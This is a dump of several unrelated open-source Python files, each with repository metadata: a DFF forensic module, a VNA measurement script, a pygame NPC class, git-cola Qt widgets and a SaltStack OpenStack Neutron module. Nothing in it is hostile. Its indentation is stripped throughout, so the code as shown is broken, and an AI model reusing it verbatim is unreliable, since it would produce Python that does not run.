res += "\n\t\tinput parameters: "
if argument.parametersType() == Parameter.NotEditable:
res += "not editable "
else:
res += "editable "
if argument.inputType() == Argument.List:
res += "list"
else:
res += "single"
pcount = argument.parametersCount()
if pcount != 0:
parameters = argument.parameters()
res += "\n\t\tpredefined parameters: "
for parameter in parameters:
if argument.type() == typeId.Node:
res += str(parameter.value().absolute())
else:
res += parameter.toString()
pcount -= 1
if pcount != 0:
res += ", "
res += "\n"
constants = conf.constants()
if len(constants) > 0:
res += "\n\tConstant: \t"
for constant in constants:
res += "\n\t\tname: " + str(constant.name())
res += "\n\t\tdescription: " + str(constant.description())
res += "\n\t\ttype: " + str(typeId.Get().typeToName(constant.type()))
cvalues = constant.values()
cvallen = len(cvalues)
if cvallen > 0:
res += "\n\t\tvalues: "
for cvalue in cvalues:
if cvalue.type() == typeId.Node:
res += str(cvalue.value().absolute())
else:
res += cvalue.toString()
cvallen -= 1
if cvallen != 0:
res += ", "
res += "\n"
return res
def show_arg(self, args):
res = ""
if len(args):
res += "\n\n\t\tArguments: \t"
for argname in args.keys():
res += "\n\t\t\tname: " + argname
res += "\n\t\t\tparameters: "
val = args[argname]
if val.type() == typeId.List:
vlist = val.value()
vlen = len(vlist)
for item in vlist:
if item.type == typeId.Node:
res += str(val.value().absolute())
else:
res += item.toString()
vlen -= 1
if vlen != 0:
res += ", "
elif val.type() == typeId.Node:
res += str(val.value().absolute())
return res
def show_res(self, results):
res = self.fillMap(3, results, "\n\n\t\tResults:")
return res
def c_display(self):
print self.info
def getmodinfo(self, modname):
conf = self.cm.configByName(modname)
if conf == None:
return
self.lproc = self.tm.lprocessus
self.info += "\n" + modname + self.show_config(modname)
for proc in self.lproc:
if proc.mod.name == modname:
self.info += "\n\tProcessus " + str(proc.pid)
stime = datetime.fromtimestamp(proc.timestart)
self.info += "\n\t\texecution started at : " + str(stime)
if proc.timeend:
etime = datetime.fromtimestamp(proc.timeend)
self.info += "\n\t\texecution finished at : " + str(etime)
else:
etime = datetime.fromtimestamp(time.time())
delta = etime - stime
self.info += "\n\t\texecution time: " + str(delta)
self.info += self.show_arg(proc.args)
self.info += self.show_res(proc.res)
def start(self, args):
self.info = ""
if args.has_key("modules"):
modnames = args['modules'].value()
for modname in modnames:
self.getmodinfo(modname.value())
else:
self.modules = self.loader.modules
for modname in self.modules:
self.getmodinfo(modname)
class info(Module):
"""Show info on loaded drivers: configuration, arguments, results
"""
def __init__(self):
Module.__init__(self, "info", INFO)
self.tags = "builtins"
self.conf.addArgument({"name": "modules",
"description": "Display information concerning provided modules",
"input": Argument.Optional|Argument.List|typeId.String})
|
halbbob/dff
|
modules/builtins/info.py
|
Python
|
gpl-2.0
| 5,653
|
#!/usr/bin/python
# script to save a bunch of VNA phase measurements while stepping beam numbers
# useful for characterizing the RF path (transmitter antenna port to receiver input) and looking for time delay differences
# requires ssh key for QNX box and VNA
# jon klein, jtklein@alaska.edu, mit license
# jef spaleta
from pylab import *
from vna_control import *
from csv_utils import *
import argparse, os, time, sys
SWEEP_CENTER = 15e6
SWEEP_SPAN = 20e6
SWEEP_POINTS = 1201
TX_STARTUP_DELAY = 2 # 20
BEAMS = 24
if __name__ == '__main__':
    # set up argument parser and parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("--cal", action="count", help="run through calibration on VNA before taking measurements", default=0)
parser.add_argument("--vnaip", help="specify VNA ip address", default=VNAHOST)
parser.add_argument("--ddir", help="specify a directory to save the data in", default='adw_cable_short')
parser.add_argument("--avg", type=int, help="specify count to average", default=1)
parser.add_argument("--paths", type=int, help="specify number of paths to calibrate", default=20)
args = parser.parse_args()
    # sanity check arguments
if args.avg < 1:
sys.exit("error: average count is less than 1")
if not os.path.exists(args.ddir):
sys.exit("error: data directory does not exist: %s" % (directory))
if args.paths < 1:
sys.exit("error: path count is less than 1")
# open connection with VNA
vna = lan_init(args.vnaip)
# preset VNA if calibrating
if args.cal:
vna_preset(vna)
# init VNA measurements
vna_init(vna, param='S22')
# configure VNA measurements (add smoothing to time delay channel, enable averaging)
vna_setspan(vna, SWEEP_SPAN, SWEEP_CENTER, SWEEP_POINTS)
vna_setave(vna,args.avg)
vna_enableave(vna,True)
vna_smoothapeture(vna,2,5.0)
vna_enablesmoothing(vna,2,True)
# calibrate VNA if run with --cal
if args.cal:
print 'calibrating VNA'
vna_through_cal(vna)
vna_trigger(vna, args.avg)
# setup csv data structure
csvdat = csv_data()
csvdat.sweep_count = SWEEP_POINTS
csvdat.ave_count = args.avg
csvdat.ave_enable = (args.avg > 1)
csvdat.smoothing_percent = 5
csvdat.smoothing_enable = True
csvdat.freqs = vna_readspan(vna)
csvdat.freq_start = min(csvdat.freqs)
csvdat.freq_end = max(csvdat.freqs)
# step through each path and measure phase, time delay, and magnitude at each beam setting
for p in range(args.paths):
p = int(raw_input('connect and enter a path number and then press enter to continue... '))
time.sleep(TX_STARTUP_DELAY) # wait for transmitter to warm up
csvdat.card = p
csvdat.beam = 0
vna_clearave(vna)
vna_trigger(vna, args.avg)
csvdat.tdelay = vna_readtimedelay(vna)
csvdat.ephase = vna_readextendedphase(vna)
csvdat.phase = vna_readphase(vna)
csvdat.mlog = vna_readmlog(vna)
write_csv(args.ddir, csvdat)
lan_close(vna)
|
loxodes/SuperDARN_Hardware_Tools
|
kingsalmon_scripts/antenna_grab.py
|
Python
|
gpl-2.0
| 3,161
|
import os
import sys
import random
import pygame
from Engine import *
from Montag import *
from Character import Character
from pygame.locals import *
class AICharacter(Character):
def __init__(self, screen, **kwargs):
super().__init__(screen, **kwargs)
self.enemy = kwargs.get("enemy", None)
self.movement_state = kwargs.get("movement_state", None)
self.waypoints = kwargs.get("waypoints", None)
self.area = kwargs.get("random_walk_area", None)
self.obstaclemap = kwargs.get("obstaclemap", None)
self.pathfinding_grid = self.obstaclemap.grid
self.dialog = kwargs.get("dialog", None)
self.dialogmanager = kwargs.get("dialogmanager", None)
if self.waypoints:
self.remaining_waypoints = self.waypoints.copy()
self.grid_pos = self.remaining_waypoints[0].copy()
self.walk_to_points = [self.remaining_waypoints.pop(0)]
self.movement_state = "waypoints"
self.state = "walk"
elif self.area:
self.movement_state = "random_walk"
self.pause_time = kwargs.get("pause_time", 1000)
self.pause_time_passed = 0
def click(self):
if self.dialog:
self.dialogmanager.start_dialog(self.dialog)
def hold_position(self):
self.movement_state = None
def update(self, current_time=None, event=None):
if not current_time:
current_time = pygame.time.get_ticks()
if self.state == "stand":
time_change = current_time - self.current_time
self.pause_time_passed += time_change
else:
self.pause_time_passed = 0
if not self.dead:
if not self.movement_temporarily_suppressed:
if not self.walk_to_points and self.pause_time_passed >= self.pause_time:
if self.movement_state == "random_walk":
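                        # Pick a random target inside the rectangular area
                        # (x, y, width, height) and path-find to it.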
self.walk_to_points = self.pathfinding_grid.find_path(self.grid_pos, [
random.uniform(self.area[0], self.area[0] + self.area[2]),
random.uniform(self.area[1], self.area[1] + self.area[3])])
self.frame = 0
elif self.movement_state == "waypoints":
if len(self.remaining_waypoints) == 0:
self.remaining_waypoints = self.waypoints.copy()
self.walk_to_points = [self.remaining_waypoints.pop(0)]
super().update(current_time, event)
if __name__ == "__main__":
pygame.init()
clock = pygame.time.Clock()
screen_info = pygame.display.Info()
screen_size = [screen_info.current_w, screen_info.current_h]
screen = pygame.display.set_mode(screen_size, RESIZABLE)
chars = []
b = Engine(screen)
b.load_tilemap("TheMap/map.floor", 0)
b.load_obstaclemap("TheMap/map.obstacles", 0)
montag = AICharacter(screen, "graphics/droids/blue_guard/atlas.txt", "graphics/droids/red_guard/config.txt", pathfinding_grid=b.obstacles.grid, pos=[3, 0], movement_state="random_walk", area=[5, 0, 10, 5])
while True:
current_time = pygame.time.get_ticks()
clock.tick(60)
screen.fill((0, 0, 0))
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
sys.exit()
elif event.type == VIDEORESIZE:
screen_size = event.dict["size"]
screen = pygame.display.set_mode(screen_size, RESIZABLE)
else:
montag.update(current_time, event)
b.update()
b.draw([0, 0])
#chars.sort(key=lambda x: (x.pos[1], x.pos[0]))
montag.update(current_time)
montag.draw()
pygame.display.update()
|
lumidify/fahrenheit451
|
AICharacter.py
|
Python
|
gpl-2.0
| 3,797
|
from __future__ import division, absolute_import, unicode_literals
import time
from qtpy import QtCore
from qtpy import QtGui
from qtpy import QtWidgets
from qtpy.QtCore import Qt
from qtpy.QtCore import Signal
from qtpy.QtWidgets import QDockWidget
from .. import core
from .. import gitcfg
from .. import qtcompat
from .. import qtutils
from .. import utils
from ..settings import Settings
from . import defs
class WidgetMixin(object):
"""Mix-in for common utilities and serialization of widget state"""
def __init__(self):
self._unmaximized_size = None
def center(self):
parent = self.parent()
if parent is None:
return
left = parent.x()
width = parent.width()
center_x = left + width//2
x = center_x - self.width()//2
y = parent.y()
self.move(x, y)
def resize_to_desktop(self):
desktop = QtWidgets.QApplication.instance().desktop()
width = desktop.width()
height = desktop.height()
if utils.is_darwin():
self.resize(width, height)
else:
shown = self.isVisible()
            # An early show() fools Windows focus-stealing prevention. The
            # main window is blocked for the duration of "git rebase" and we
            # don't want to present a blocked window with git-xbase hidden
            # somewhere.
self.show()
self.setWindowState(Qt.WindowMaximized)
if not shown:
self.hide()
def name(self):
"""Returns the name of the view class"""
return self.__class__.__name__.lower()
def save_state(self, settings=None):
if settings is None:
settings = Settings()
settings.load()
if gitcfg.current().get('cola.savewindowsettings', True):
settings.save_gui_state(self)
def resizeEvent(self, event):
super(WidgetMixin, self).resizeEvent(event)
        # Use a timer so that the window size and state are up to date.
        # If we ask for the window state here it will never realize that
        # we have been maximized because the window state change is processed
        # after the resize event. Using a timer event causes it to happen
        # after all the events have been processed.
size = event.size()
QtCore.QTimer.singleShot(1, lambda: self._store_unmaximized_size(size))
def _store_unmaximized_size(self, size):
state = self.windowState()
maximized = bool(state & Qt.WindowMaximized)
if not maximized:
width, height = size.width(), size.height()
if width > 0 and height > 0:
self._unmaximized_size = (width, height)
def restore_state(self, settings=None):
if settings is None:
settings = Settings()
settings.load()
state = settings.get_gui_state(self)
return bool(state) and self.apply_state(state)
def apply_state(self, state):
"""Imports data for view save/restore"""
result = True
try:
self.resize(state['width'], state['height'])
except:
result = False
try:
self.move(state['x'], state['y'])
except:
result = False
try:
if state['maximized']:
self.showMaximized()
try:
self._unmaximized_size = (state['width'], state['height'])
except:
pass
except:
result = False
self._apply_state_applied = result
return result
def export_state(self):
"""Exports data for view save/restore"""
state = self.windowState()
maximized = bool(state & Qt.WindowMaximized)
# when maximized we don't want to overwrite saved width/height with
# desktop dimensions.
if maximized and self._unmaximized_size:
width, height = self._unmaximized_size
else:
width, height = self.width(), self.height()
return {
'x': self.x(),
'y': self.y(),
'width': width,
'height': height,
'maximized': maximized,
}
def save_settings(self):
settings = Settings()
settings.load()
settings.add_recent(core.getcwd())
return self.save_state(settings=settings)
def closeEvent(self, event):
self.save_settings()
self.Base.closeEvent(self, event)
def init_state(self, settings, callback, *args, **kwargs):
"""Restore saved settings or set the initial location"""
if not self.restore_state(settings=settings):
callback(*args, **kwargs)
self.center()
class MainWindowMixin(WidgetMixin):
def __init__(self):
WidgetMixin.__init__(self)
# Dockwidget options
self.dockwidgets = []
self.lock_layout = False
self.widget_version = 0
qtcompat.set_common_dock_options(self)
def export_state(self):
"""Exports data for save/restore"""
state = WidgetMixin.export_state(self)
windowstate = self.saveState(self.widget_version)
state['lock_layout'] = self.lock_layout
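        # saveState() returns a binary QByteArray; base64-encode it so the
        # window state can be stored as plain text alongside the other
        # settings and round-tripped through restoreState() in apply_state().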
state['windowstate'] = windowstate.toBase64().data().decode('ascii')
return state
def apply_state(self, state):
result = WidgetMixin.apply_state(self, state)
windowstate = state.get('windowstate', None)
if windowstate is None:
result = False
else:
from_base64 = QtCore.QByteArray.fromBase64
result = self.restoreState(
from_base64(core.encode(windowstate)),
self.widget_version) and result
self.lock_layout = state.get('lock_layout', self.lock_layout)
self.update_dockwidget_lock_state()
self.update_dockwidget_tooltips()
return result
def set_lock_layout(self, lock_layout):
self.lock_layout = lock_layout
self.update_dockwidget_lock_state()
def update_dockwidget_lock_state(self):
if self.lock_layout:
features = (QDockWidget.DockWidgetClosable |
QDockWidget.DockWidgetFloatable)
else:
features = (QDockWidget.DockWidgetClosable |
QDockWidget.DockWidgetFloatable |
QDockWidget.DockWidgetMovable)
for widget in self.dockwidgets:
widget.titleBarWidget().update_tooltips()
widget.setFeatures(features)
def update_dockwidget_tooltips(self):
for widget in self.dockwidgets:
widget.titleBarWidget().update_tooltips()
class TreeMixin(object):
def __init__(self, widget, Base):
self.widget = widget
self.Base = Base
widget.setAlternatingRowColors(True)
widget.setUniformRowHeights(True)
widget.setAllColumnsShowFocus(True)
widget.setAnimated(True)
widget.setRootIsDecorated(False)
def keyPressEvent(self, event):
"""
        Make LeftArrow work on non-directories.
When LeftArrow is pressed on a file entry or an unexpanded
directory, then move the current index to the parent directory.
This simplifies navigation using the keyboard.
For power-users, we support Vim keybindings ;-P
"""
# Check whether the item is expanded before calling the base class
# keyPressEvent otherwise we end up collapsing and changing the
# current index in one shot, which we don't want to do.
widget = self.widget
index = widget.currentIndex()
was_expanded = widget.isExpanded(index)
was_collapsed = not was_expanded
# Vim keybindings...
# Rewrite the event before marshalling to QTreeView.event()
key = event.key()
# Remap 'H' to 'Left'
if key == Qt.Key_H:
event = QtGui.QKeyEvent(event.type(),
Qt.Key_Left,
event.modifiers())
# Remap 'J' to 'Down'
elif key == Qt.Key_J:
event = QtGui.QKeyEvent(event.type(),
Qt.Key_Down,
event.modifiers())
# Remap 'K' to 'Up'
elif key == Qt.Key_K:
event = QtGui.QKeyEvent(event.type(),
Qt.Key_Up,
event.modifiers())
# Remap 'L' to 'Right'
elif key == Qt.Key_L:
event = QtGui.QKeyEvent(event.type(),
Qt.Key_Right,
event.modifiers())
# Re-read the event key to take the remappings into account
key = event.key()
if key == Qt.Key_Up:
idxs = widget.selectedIndexes()
rows = [idx.row() for idx in idxs]
if len(rows) == 1 and rows[0] == 0:
# The cursor is at the beginning of the line.
# If we have selection then simply reset the cursor.
# Otherwise, emit a signal so that the parent can
# change focus.
widget.up.emit()
elif key == Qt.Key_Space:
widget.space.emit()
result = self.Base.keyPressEvent(widget, event)
# Let others hook in here before we change the indexes
widget.index_about_to_change.emit()
# Automatically select the first entry when expanding a directory
if (key == Qt.Key_Right and was_collapsed and
widget.isExpanded(index)):
index = widget.moveCursor(widget.MoveDown, event.modifiers())
widget.setCurrentIndex(index)
# Process non-root entries with valid parents only.
elif key == Qt.Key_Left and index.parent().isValid():
# File entries have rowCount() == 0
if widget.model().itemFromIndex(index).rowCount() == 0:
widget.setCurrentIndex(index.parent())
# Otherwise, do this for collapsed directories only
elif was_collapsed:
widget.setCurrentIndex(index.parent())
# If it's a movement key ensure we have a selection
elif key in (Qt.Key_Left, Qt.Key_Up, Qt.Key_Right, Qt.Key_Down):
# Try to select the first item if the model index is invalid
item = self.selected_item()
if item is None or not index.isValid():
index = widget.model().index(0, 0, QtCore.QModelIndex())
if index.isValid():
widget.setCurrentIndex(index)
return result
def items(self):
root = self.widget.invisibleRootItem()
child = root.child
count = root.childCount()
return [child(i) for i in range(count)]
def selected_items(self):
"""Return all selected items"""
widget = self.widget
if hasattr(widget, 'selectedItems'):
return widget.selectedItems()
else:
item_from_index = widget.model().itemFromIndex
return [item_from_index(i) for i in widget.selectedIndexes()]
def selected_item(self):
"""Return the first selected item"""
selected_items = self.selected_items()
if not selected_items:
return None
return selected_items[0]
def current_item(self):
item = None
widget = self.widget
if hasattr(widget, 'currentItem'):
item = widget.currentItem()
else:
index = widget.currentIndex()
if index.isValid():
item = widget.model().itemFromIndex(index)
return item
class DraggableTreeMixin(TreeMixin):
"""A tree widget with internal drag+drop reordering of rows
Expects that the widget provides an `items_moved` signal.
"""
def __init__(self, widget, Base):
super(DraggableTreeMixin, self).__init__(widget, Base)
self._inner_drag = False
widget.setAcceptDrops(True)
widget.setSelectionMode(widget.SingleSelection)
widget.setDragEnabled(True)
widget.setDropIndicatorShown(True)
widget.setDragDropMode(QtWidgets.QAbstractItemView.InternalMove)
widget.setSortingEnabled(False)
def dragEnterEvent(self, event):
"""Accept internal drags only"""
widget = self.widget
self.Base.dragEnterEvent(widget, event)
self._inner_drag = event.source() == widget
if self._inner_drag:
event.acceptProposedAction()
else:
event.ignore()
def dragLeaveEvent(self, event):
widget = self.widget
self.Base.dragLeaveEvent(widget, event)
if self._inner_drag:
event.accept()
else:
event.ignore()
self._inner_drag = False
def dropEvent(self, event):
"""Re-select selected items after an internal move"""
if not self._inner_drag:
event.ignore()
return
widget = self.widget
clicked_items = self.selected_items()
event.setDropAction(Qt.MoveAction)
self.Base.dropEvent(widget, event)
if clicked_items:
widget.clearSelection()
for item in clicked_items:
item.setSelected(True)
widget.items_moved.emit(clicked_items)
self._inner_drag = False
event.accept() # must be called after dropEvent()
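    # Note: dropEvent() above re-selects by item identity (rather than by row
    # index), which keeps the same logical rows highlighted after Qt moves
    # them into their new positions.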
def mousePressEvent(self, event):
"""Clear the selection when a mouse click hits no item"""
widget = self.widget
clicked_item = widget.itemAt(event.pos())
if clicked_item is None:
widget.clearSelection()
return self.Base.mousePressEvent(widget, event)
class Widget(WidgetMixin, QtWidgets.QWidget):
Base = QtWidgets.QWidget
def __init__(self, parent=None):
QtWidgets.QWidget.__init__(self, parent)
WidgetMixin.__init__(self)
class Dialog(WidgetMixin, QtWidgets.QDialog):
Base = QtWidgets.QDialog
def __init__(self, parent=None, save_settings=False):
QtWidgets.QDialog.__init__(self, parent)
WidgetMixin.__init__(self)
self._save_settings = save_settings
def reject(self):
if self._save_settings:
self.save_settings()
return self.Base.reject(self)
class MainWindow(MainWindowMixin, QtWidgets.QMainWindow):
Base = QtWidgets.QMainWindow
def __init__(self, parent=None):
QtWidgets.QMainWindow.__init__(self, parent)
MainWindowMixin.__init__(self)
self.setStyleSheet("""
QMainWindow::separator {
width: %(separator)spx;
height: %(separator)spx;
}
QMainWindow::separator:hover {
background: white;
}
""" % dict(separator=defs.separator))
class TreeView(QtWidgets.QTreeView):
Mixin = TreeMixin
up = Signal()
space = Signal()
index_about_to_change = Signal()
def __init__(self, parent=None):
QtWidgets.QTreeView.__init__(self, parent)
self._mixin = self.Mixin(self, QtWidgets.QTreeView)
def keyPressEvent(self, event):
return self._mixin.keyPressEvent(event)
def current_item(self):
return self._mixin.current_item()
def selected_item(self):
return self._mixin.selected_item()
def selected_items(self):
return self._mixin.selected_items()
def items(self):
return self._mixin.items()
class TreeWidget(QtWidgets.QTreeWidget):
Mixin = TreeMixin
up = Signal()
space = Signal()
index_about_to_change = Signal()
def __init__(self, parent=None):
super(TreeWidget, self).__init__(parent)
self._mixin = self.Mixin(self, QtWidgets.QTreeWidget)
def keyPressEvent(self, event):
return self._mixin.keyPressEvent(event)
def current_item(self):
return self._mixin.current_item()
def selected_item(self):
return self._mixin.selected_item()
def selected_items(self):
return self._mixin.selected_items()
def items(self):
return self._mixin.items()
class DraggableTreeWidget(TreeWidget):
Mixin = DraggableTreeMixin
items_moved = Signal(object)
def mousePressEvent(self, event):
return self._mixin.mousePressEvent(event)
def dropEvent(self, event):
return self._mixin.dropEvent(event)
def dragLeaveEvent(self, event):
return self._mixin.dragLeaveEvent(event)
def dragEnterEvent(self, event):
return self._mixin.dragEnterEvent(event)
class ProgressDialog(QtWidgets.QProgressDialog):
"""Custom progress dialog
This dialog ignores the ESC key so that it is not
prematurely closed.
    A thread is spawned to animate the progress label text.
"""
def __init__(self, title, label, parent):
QtWidgets.QProgressDialog.__init__(self, parent)
if parent is not None:
self.setWindowModality(Qt.WindowModal)
self.reset()
self.setRange(0, 0)
self.setMinimumDuration(0)
self.setCancelButton(None)
self.setFont(qtutils.diff_font())
self.thread = ProgressAnimationThread(label, self)
self.thread.updated.connect(self.refresh, type=Qt.QueuedConnection)
self.set_details(title, label)
def set_details(self, title, label):
self.setWindowTitle(title)
self.setLabelText(label + ' ')
self.thread.set_text(label)
def refresh(self, txt):
self.setLabelText(txt)
def keyPressEvent(self, event):
if event.key() != Qt.Key_Escape:
super(ProgressDialog, self).keyPressEvent(event)
def show(self):
QtWidgets.QApplication.setOverrideCursor(Qt.WaitCursor)
super(ProgressDialog, self).show()
self.thread.start()
def hide(self):
QtWidgets.QApplication.restoreOverrideCursor()
self.thread.stop()
self.thread.wait()
super(ProgressDialog, self).hide()
class ProgressAnimationThread(QtCore.QThread):
"""Emits a pseudo-animated text stream for progress bars
"""
updated = Signal(object)
def __init__(self, txt, parent, timeout=0.1):
QtCore.QThread.__init__(self, parent)
self.running = False
self.txt = txt
self.timeout = timeout
self.symbols = [
'. ..',
'.. .',
'... ',
' ... ',
' ...',
]
self.idx = -1
def set_text(self, txt):
self.txt = txt
def cycle(self):
self.idx = (self.idx + 1) % len(self.symbols)
return self.txt + self.symbols[self.idx]
def stop(self):
self.running = False
def run(self):
self.running = True
while self.running:
self.updated.emit(self.cycle())
time.sleep(self.timeout)
class SpinBox(QtWidgets.QSpinBox):
def __init__(self, parent=None):
QtWidgets.QSpinBox.__init__(self, parent)
self.setMinimum(1)
self.setMaximum(99999)
self.setPrefix('')
self.setSuffix('')
|
sthalik/git-cola
|
cola/widgets/standard.py
|
Python
|
gpl-2.0
| 19,289
|
# -*- coding: utf-8 -*-
'''
Module for handling openstack neutron calls.
:maintainer: <akilesh1597@gmail.com>
:maturity: new
:platform: all
:optdepends: - neutronclient Python adapter
:configuration: This module is not usable until the following are specified
either in a pillar or in the minion's config file::
keystone.user: admin
keystone.password: verybadpass
keystone.tenant: admin
keystone.tenant_id: f80919baedab48ec8931f200c65a50df
keystone.insecure: False #(optional)
keystone.auth_url: 'http://127.0.0.1:5000/v2.0/'
If configuration for multiple openstack accounts is required, they can be
set up as different configuration profiles:
For example::
openstack1:
keystone.user: admin
keystone.password: verybadpass
keystone.tenant: admin
keystone.tenant_id: f80919baedab48ec8931f200c65a50df
keystone.auth_url: 'http://127.0.0.1:5000/v2.0/'
openstack2:
keystone.user: admin
keystone.password: verybadpass
keystone.tenant: admin
keystone.tenant_id: f80919baedab48ec8931f200c65a50df
keystone.auth_url: 'http://127.0.0.2:5000/v2.0/'
With this configuration in place, any of the neutron functions can make
use of a configuration profile by declaring it explicitly.
For example::
salt '*' neutron.list_subnets profile=openstack1
Please check 'https://wiki.openstack.org/wiki/Neutron/APIv2-specification'
for the correct arguments to the API
'''
import logging
from functools import wraps
LOG = logging.getLogger(__name__)
# Import third party libs
HAS_NEUTRON = False
try:
from neutronclient.v2_0 import client
HAS_NEUTRON = True
except ImportError:
pass
__opts__ = {}
def __virtual__():
'''
Only load this module if neutron
is installed on this minion.
'''
if HAS_NEUTRON:
return 'neutron'
return False
def _authenticate(func_name):
'''
Authenticate requests with the salt keystone module and format return data
'''
@wraps(func_name)
def decorator_method(*args, **kwargs):
'''
Authenticate request and format return data
'''
connection_args = {'profile': kwargs.get('profile', None)}
nkwargs = {}
        for kwarg in kwargs:
            if 'connection_' in kwarg:
                connection_args.update({kwarg: kwargs[kwarg]})
            elif kwarg != 'profile' and '__' not in kwarg:
                # 'profile' is only consumed by keystone.auth below; keep it
                # out of the arguments forwarded to the Neutron API call.
                nkwargs.update({kwarg: kwargs[kwarg]})
kstone = __salt__['keystone.auth'](**connection_args)
token = kstone.auth_token
endpoint = kstone.service_catalog.url_for(
service_type='network',
endpoint_type='publicURL')
neutron_interface = client.Client(
endpoint_url=endpoint, token=token)
        LOG.debug('calling with args %s', args)
        LOG.debug('calling with kwargs %s', nkwargs)
        return_data = func_name(neutron_interface, *args, **nkwargs)
        LOG.debug('got return data %s', return_data)
if isinstance(return_data, list):
# format list as a dict for rendering
return {data.get('name', None) or data['id']: data
for data in return_data}
return return_data
return decorator_method
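# Worked example (illustrative values, not from the original module):
#   list_subnets(profile='openstack1', connection_user='admin', name='net1')
# splits into connection_args={'profile': 'openstack1',
# 'connection_user': 'admin'} for keystone.auth, and nkwargs={'name': 'net1'}
# for the wrapped call, so auth settings never reach the Neutron API itself.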
@_authenticate
def list_floatingips(neutron_interface, **kwargs):
'''
list all floatingips
CLI Example:
.. code-block:: bash
salt '*' neutron.list_floatingips
'''
return neutron_interface.list_floatingips(**kwargs)['floatingips']
@_authenticate
def list_security_groups(neutron_interface, **kwargs):
'''
list all security_groups
CLI Example:
.. code-block:: bash
salt '*' neutron.list_security_groups
'''
return neutron_interface.list_security_groups(**kwargs)['security_groups']
@_authenticate
def list_subnets(neutron_interface, **kwargs):
'''
list all subnets
CLI Example:
.. code-block:: bash
salt '*' neutron.list_subnets
'''
return neutron_interface.list_subnets(**kwargs)['subnets']
@_authenticate
def list_networks(neutron_interface, **kwargs):
'''
list all networks
CLI Example:
.. code-block:: bash
salt '*' neutron.list_networks
'''
return neutron_interface.list_networks(**kwargs)['networks']
@_authenticate
def list_ports(neutron_interface, **kwargs):
'''
list all ports
CLI Example:
.. code-block:: bash
salt '*' neutron.list_ports
'''
return neutron_interface.list_ports(**kwargs)['ports']
@_authenticate
def list_routers(neutron_interface, **kwargs):
'''
list all routers
CLI Example:
.. code-block:: bash
salt '*' neutron.list_routers
'''
return neutron_interface.list_routers(**kwargs)['routers']
@_authenticate
def update_floatingip(neutron_interface, fip, port_id=None):
'''
    update a floating IP. Use this to associate the floating IP with,
    or disassociate it from, an instance's port
CLI Example:
.. code-block:: bash
to associate with an instance's port
salt '*' neutron.update_floatingip openstack-floatingip-id port-id
to disassociate from an instance's port
salt '*' neutron.update_floatingip openstack-floatingip-id
'''
neutron_interface.update_floatingip(fip, {"floatingip":
{"port_id": port_id}})
@_authenticate
def update_subnet(neutron_interface, subnet_id, **subnet_params):
'''
update given subnet
CLI Example:
.. code-block:: bash
salt '*' neutron.update_subnet openstack-subnet-id name='new_name'
'''
neutron_interface.update_subnet(subnet_id, {'subnet': subnet_params})
@_authenticate
def update_router(neutron_interface, router_id, **router_params):
'''
update given router
CLI Example:
.. code-block:: bash
salt '*' neutron.update_router openstack-router-id name='new_name'
external_gateway='openstack-network-id' administrative_state=true
'''
neutron_interface.update_router(router_id, {'router': router_params})
@_authenticate
def router_gateway_set(neutron_interface, router_id, external_gateway):
'''
Set external gateway for a router
CLI Example:
.. code-block:: bash
salt '*' neutron.update_router openstack-router-id openstack-network-id
'''
neutron_interface.update_router(
router_id, {'router': {'external_gateway_info':
{'network_id': external_gateway}}})
@_authenticate
def router_gateway_clear(neutron_interface, router_id):
'''
Clear external gateway for a router
CLI Example:
.. code-block:: bash
salt '*' neutron.update_router openstack-router-id
'''
neutron_interface.update_router(
router_id, {'router': {'external_gateway_info': None}})
@_authenticate
def create_router(neutron_interface, **router_params):
'''
Create OpenStack Neutron router
CLI Example:
.. code-block:: bash
salt '*' neutron.create_router name=R1
'''
response = neutron_interface.create_router({'router': router_params})
if 'router' in response and 'id' in response['router']:
return response['router']['id']
@_authenticate
def router_add_interface(neutron_interface, router_id, subnet_id):
'''
Attach router to a subnet
CLI Example:
.. code-block:: bash
salt '*' neutron.router_add_interface openstack-router-id subnet-id
'''
neutron_interface.add_interface_router(router_id, {'subnet_id': subnet_id})
@_authenticate
def router_rem_interface(neutron_interface, router_id, subnet_id):
'''
    Detach router from a subnet
CLI Example:
.. code-block:: bash
salt '*' neutron.router_rem_interface openstack-router-id subnet-id
'''
neutron_interface.remove_interface_router(
router_id, {'subnet_id': subnet_id})
@_authenticate
def create_security_group(neutron_interface, **sg_params):
'''
Create a new security group
CLI Example:
.. code-block:: bash
salt '*' neutron.create_security_group name='new_rule'
description='test rule'
'''
response = neutron_interface.create_security_group(
{'security_group': sg_params})
if 'security_group' in response and 'id' in response['security_group']:
return response['security_group']['id']
@_authenticate
def create_security_group_rule(neutron_interface, **rule_params):
'''
Create a rule entry for a security group
CLI Example:
.. code-block:: bash
salt '*' neutron.create_security_group_rule
'''
neutron_interface.create_security_group_rule(
{'security_group_rule': rule_params})
@_authenticate
def create_floatingip(neutron_interface, **floatingip_params):
'''
Create a new floating IP
CLI Example:
.. code-block:: bash
salt '*' neutron.create_floatingip floating_network_id=ext-net-id
'''
response = neutron_interface.create_floatingip(
{'floatingip': floatingip_params})
if 'floatingip' in response and 'id' in response['floatingip']:
return response['floatingip']['id']
@_authenticate
def create_subnet(neutron_interface, **subnet_params):
'''
Create a new subnet in OpenStack
CLI Example:
.. code-block:: bash
salt '*' neutron.create_subnet name='subnet name'
network_id='openstack-network-id' cidr='192.168.10.0/24' \\
gateway_ip='192.168.10.1' ip_version='4' enable_dhcp=false \\
start_ip='192.168.10.10' end_ip='192.168.10.20'
'''
if 'start_ip' in subnet_params:
subnet_params.update(
{'allocation_pools': [{'start': subnet_params.pop('start_ip'),
'end': subnet_params.pop('end_ip', None)}]})
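    # e.g. start_ip='192.168.10.10' end_ip='192.168.10.20' becomes
    # {'allocation_pools': [{'start': '192.168.10.10',
    #                        'end': '192.168.10.20'}]}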
response = neutron_interface.create_subnet({'subnet': subnet_params})
if 'subnet' in response and 'id' in response['subnet']:
return response['subnet']['id']
@_authenticate
def create_network(neutron_interface, **network_params):
'''
Create a new network segment in OpenStack
CLI Example:
.. code-block:: bash
salt '*' neutron.create_network name=External
provider_network_type=flat provider_physical_network=ext
'''
network_params = {param.replace('_', ':', 1):
network_params[param] for param in network_params}
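    # e.g. provider_network_type='flat' is sent as 'provider:network_type',
    # matching Neutron's provider-extension attribute names.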
response = neutron_interface.create_network({'network': network_params})
if 'network' in response and 'id' in response['network']:
return response['network']['id']
@_authenticate
def create_port(neutron_interface, **port_params):
'''
Create a new port in OpenStack
CLI Example:
.. code-block:: bash
salt '*' neutron.create_port network_id='openstack-network-id'
'''
response = neutron_interface.create_port({'port': port_params})
if 'port' in response and 'id' in response['port']:
